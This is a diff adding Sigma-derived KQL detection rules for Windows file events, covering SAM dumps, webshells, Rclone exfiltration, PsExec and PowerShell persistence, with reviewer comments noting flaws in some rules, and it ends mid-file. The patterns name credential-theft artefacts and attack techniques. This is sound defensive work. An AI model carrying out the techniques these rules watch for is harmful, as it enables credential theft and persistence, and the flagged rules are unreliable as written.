index 00000000..47dd212e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Outlook Form
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-10
+// Level: high
+// Description: Detects the creation of a new Outlook form which can contain malicious code
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.003
+// False Positives:
+// - Legitimate use of outlook forms
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
new file mode 100644
index 00000000..2cf3d628
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation
+
+DeviceFileEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
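Review bot: In the .Exe.Local rule the five `FolderPath startswith "C:\\Windows\\System32\\<name>.exe.local"` clauses hard-code the system drive, so a Windows installation on any other drive letter never matches; the other rules in this chunk anchor system-directory fragments with `contains` and a leading separator instead, which is drive-agnostic. Since `endswith "\\comctl32.dll"` is already required, `FolderPath contains "\\Windows\\System32\\logonUI.exe.local\\"` (and likewise for the other four names) keeps the match confined to inside the `.exe.local` folder without the drive assumption. The Outlook Form hunk above it looks fine.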
diff --git a/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
new file mode 100644
index 00000000..925e5d2e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
@@ -0,0 +1,12 @@
+// Title: Potential RipZip Attack on Startup Folder
+// Author: Greg (rule)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
+// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
+// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
new file mode 100644
index 00000000..33c6c458
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
@@ -0,0 +1,12 @@
+// Title: Potential SAM Database Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Rare cases of administrative activity
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
new file mode 100644
index 00000000..d38c938e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
@@ -0,0 +1,15 @@
+// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE
+// Author: Christopher Peacock '@securepeacock', SCYTHE
+// Date: 2021-10-24
+// Level: high
+// Description: Detects PowerShell writing startup shortcuts.
+// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
+// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
+// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
new file mode 100644
index 00000000..46850117
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
new file mode 100644
index 00000000..397ebdfd
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
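Review bot: The converted predicate `FolderPath contains "\\.ps"` (and likewise `"\\.dll"`) only matches a path in which a backslash is immediately followed by `.ps` or `.dll`, so the very example the description gives, `\WindowsPowerShell\Modules\malware\malware.psm1`, would not match and the rule is effectively dead. The source rule presumably expressed the "module file directly under the first-level folder" structure with a wildcard or regex that the converter flattened into a literal substring; I'd verify against the Sigma original and express that intent in KQL, e.g. `| where FolderPath matches regex @"(?i)\\WindowsPowerShell\\Modules\\[^\\]+\\[^\\]+\.(ps[dm]?1|dll)$"`. Since this file is produced by the conversion workflow, the fix belongs in the converter's handling of wildcard/regex modifiers rather than in a hand edit of the generated output.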
@@ -0,0 +1,12 @@
+// Title: Potential Webshell Creation On Static Website
+// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Legitimate administrator or developer creating legitimate executable files in a web application folder
+
+DeviceFileEvents
+| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
new file mode 100644
index 00000000..953859b2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Winnti Dropper Activity
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
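Review bot: The exclusion `InitiatingProcessFolderPath =~ "System"` in the webshell rule depends on how the table populates that column for the kernel System process; if that row carries an empty folder path and only `InitiatingProcessFileName` holds `System`, the filter never matches and the System-process exclusion of the source rule is silently lost, raising the false-positive rate rather than missing detections. I'd confirm against live DeviceFileEvents data and, if the column is empty there, have the converter emit `InitiatingProcessFileName =~ "System"` for this case. The same expression is generated in potentially_suspicious_wdac_policy_file_creation.kql, so one converter fix covers both.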
diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
new file mode 100644
index 00000000..7a48ac32
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: medium
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
new file mode 100644
index 00000000..3bd9a478
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious WDAC Policy File Creation
+// Author: X__Junior
+// Date: 2025-02-07
+// Level: medium
+// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Administrators and security vendors could leverage WDAC, apply additional filters as needed.
+
+DeviceFileEvents
+| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath in~ 
("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql
new file mode 100644
index 00000000..05104f54
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: low
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Likely
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
new file mode 100644
index 00000000..0fc8d086
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Module File Created By Non-PowerShell Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql
new file mode 100644
index 00000000..0971aa8c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Profile Modification
+// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+// - System administrator creating Powershell profile manually
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
new file mode 100644
index 00000000..258befc7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Dropped Via PowerShell.EXE
+// Author: frack113
+// Date: 2023-05-09
+// Level: low
+// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..4fbb64c8
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,13 @@
+// Title: Process Explorer Driver Creation By Non-Sysinternals Binary
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-05
+// Level: high
+// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
+// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process explorer binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
new file mode 100644
index 00000000..aca6fe50
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
@@ -0,0 +1,12 @@
+// Title: Process Monitor Driver Creation By Non-Sysinternals Binary
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1068
+// False Positives:
+// - Some false positives may occur with legitimate renamed process monitor binaries
+
+DeviceFileEvents
+| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
new file mode 100644
index 00000000..91e44e54
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
@@ -0,0 +1,12 @@
+// Title: PSEXEC Remote Execution File Artefact
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-21
+// Level: high
+// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.privilege-escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
new file mode 100644
index 00000000..50c6f190
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: PsExec Service File Creation
+// Author: Thomas Patzke
+// Date: 2017-06-12
+// Level: low
+// Description: Detects default PsExec service filename which indicates PsExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSEXESVC.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..57a5d22c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: PSScriptPolicyTest Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..5812406c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Publisher Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".pub" files from those locations
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
new file mode 100644
index 00000000..016519fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Rclone Config File Creation
+// Author: Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-26
+// Level: medium
+// Description: Detects Rclone config files being created
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+// - Legitimate Rclone usage
+
+DeviceFileEvents
+| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
new file mode 100644
index 00000000..82601c7f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: RemCom Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\RemComSvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
new file mode 100644
index 00000000..4ba6c0c6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - ScreenConnect Temporary File
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
+// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Legitimate use of ScreenConnect
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..1662a343
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
@@ -0,0 +1,10 @@
+// Title: Renamed VsCode Code Tunnel Execution - File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: high
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/scr_file_write_event.kql b/KQL/rules/windows/file/file_event/scr_file_write_event.kql
new file mode 100644
index 00000000..24feec24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/scr_file_write_event.kql
@@ -0,0 +1,12 @@
+// Title: SCR File Write Event
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-04-27
+// Level: medium
+// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - The installation of new screen savers by third party software
+
+DeviceFileEvents
